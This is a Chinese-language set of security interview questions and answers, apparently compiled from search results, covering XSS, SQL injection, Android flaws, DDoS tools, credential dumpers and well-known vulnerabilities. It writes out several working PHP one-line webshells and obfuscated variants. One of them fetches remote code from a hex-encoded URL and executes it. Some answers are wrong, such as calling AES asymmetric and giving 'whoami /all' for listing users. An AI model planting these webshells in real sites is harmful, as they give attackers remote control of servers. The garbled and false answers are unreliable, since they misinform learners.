本文的筆試題答案來自百度、谷歌,筆者只是知識的搬運工,如有錯誤歡迎大家批評指正!!
xss的危害
xss***過程大致如下:***者的Html輸入—>web程序—>進入數據庫—>web程序—>用戶瀏覽器,***者在遠程web頁面的html代碼中插入具有惡意目的的數據,用戶認爲該頁面是可信的,但瀏覽器下載該頁面時,嵌入其中的腳本將被解釋執行。
防範方法:過濾"<>","&","=","","""",ReplaceR(str,"<","<"),Replace(str,">",">")
獲取域名DNS記錄的命令:nslookup,dig
php避免sql注入的函數:addslashes用於處理單字節的,mysql_real_escape_string可用於處理多字節,且只能用在(php5以上 or php4>=4.3.0)版本,否則只能用mysql_escape_string,magic_quotes_gpc只有在頁面傳遞 $_GET,$_POST,$_COOKIE 時纔會發生作用,主動進行調用,在web客戶端執行.
android開發中哪些習慣會導致安全漏洞:
a.數據存儲:將隱私數據明文保存在外部存儲,將系統數據明文保存在外部存儲,將軟件運行時依賴的數據保存在外部存儲,將軟件安裝包或者二進制代碼保存在外部存儲,全局可讀寫的內部文件,內部敏感文件被root權限軟件讀寫
b.網絡通信:不加密地明文傳輸敏感數據,SSL通信不檢查證書有效性(可能造成中間人***),使用短信註冊賬戶或接收密碼
c.密碼和認證策略:明文存儲和編碼存儲密碼,對外服務的弱密碼或固定密碼,使用IMEI或IMSI作爲唯一認證憑據
cc***:模擬多個用戶不停地訪問那些需要大量數據操作的頁面,造成服務器資源的浪費,導致cpu長期處在100%,永遠有處理不完的連接,造成網絡阻塞。分爲直接***,代理***,僵屍網絡***。當遭遇cc***時,應對手段:取消域名綁定,域名欺騙解析,更改web端口,IIS屏蔽ip
常見PHP“一句話***”:<?php eval($_POST[CMD]);?> or <?php eval($_GET[CMD]);?>
變種:
<?php $x=$_GET[‘z’];@eval(“$x;”);?>,$a=str_replace(x,””,”axsxxsxexrxxt”);$a($_POST[“code”]);,
$_GET[‘a’]($_GET[‘b’]);,
($code = $_POST['code’])&&@preg_replace(‘/ad/e’,’@’.str_rot13(‘riny’).'($code)’, ‘add’);,
$filename=$_GET[‘code’];include ($filename);,
上傳.user.ini,並且寫入auto_prepend_file=code.gif 將一句話隱藏在code.gif中,並且將它上傳到同一目錄下,if(empty($_SESSION[‘api’]))$_SESSION[‘api’]=substr(file_get_contents(sprintf(‘%s? %s’,pack(“H*”,’687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())),3649);@preg_replace(“~(.*)~ies”,gzuncompress($_SESSION[‘api’]),null);
nmap 10.5.5.5.1 默認的掃描端口:沒明白什麼意思!
android manifest.xml什麼配置使內部文件被盜?
自動化web漏洞掃描工具有哪些:nikito,paros proxy,webscarab,webinspect,owasp zap,burpsuite,IBM security appscan,acunetix web vulnerability scanner,safe3 scanner,n-stealth
http數據抓包工具:各瀏覽器自帶的瀏覽器,wireshark,fiddler等等
AES加密:非對稱加密,其他的還有RSA,Elgamal算法等
哪些工具可以抓取windows的明文密碼:mimikatz 2.0,wce 1.42 beta,fgdump 2.10,powermemory-RWMC
哪些服務器存在文件解析漏洞:詳情可見http://drops.wooyun.org/papers/539
DDOS***工具:LOIC,XOIC,HULK,DDOSIM-layer,R-U-Dead-Yet,Tor';hammer,PyLoris,OWASP DOS HTTP POST,DAVOSET,黃金眼http拒絕服務工具
攔截修改http數據包的工具:pproxy,fiddler,charles
如何大批量獲取網站註冊用戶身份信息?
xcodeghost,wormhole,心臟滴血,shellshock的危害
xcodeghost:xcode帶有coreservice庫文件,編譯出來的app就會被ghost感染。會手機iphone以及app的一些基本信息,比如系統版本,語言,國家,應用名稱等等,但代碼本身並無惡意。
wormhole:無論是wifi還是3g/4g網絡,只要是聯網情況下都有可能遭受***。且此漏洞只和app有關,不受系統版本影響。
心臟滴血:這是一個出現在加密程序庫openSSL的程序錯誤,原因是在實現TLS的心跳擴展時沒有對輸入進行適當的驗證(缺少便捷檢查),屬於緩衝區過讀錯誤,即可讀的數據比應該允許讀取的數據多。每次心跳中暴露客戶端與服務器通信中的64k內存。
shellshock(破殼):bash4.3及以前的版本在處理某些構造的環境變量時存在安全漏洞,向環境變量值內的函數定義後添加多餘的字符串,***者可通過此漏洞繞過或改變環境限制,以執行任意的shell命令甚至完全控制目標系統。
CSRF(跨站請求僞造):通過僞造身份來提交post和get請求來完成跨域的***
Android應用http中間人***原因:詳見http://jaq.alibaba.com/blog.htm?id=60
linux下查看ssh登錄歷史記錄命令:less secure,linux下登錄日誌在/var/log中
訪問web網站的某資源不存在,返回http的狀態碼是:404
ASLR(地址隨機化)是對抗緩衝區溢出***的技術。
“xss終結者”使用HTTP頭部來限制資源的策略是:CSP(content security policy)
win下查看系統用戶列表的命令:whoami /all
sql(mysql)注入常用延時函數:benchmark
Redis默認端口:6379
網站被上傳了webshell如何處理?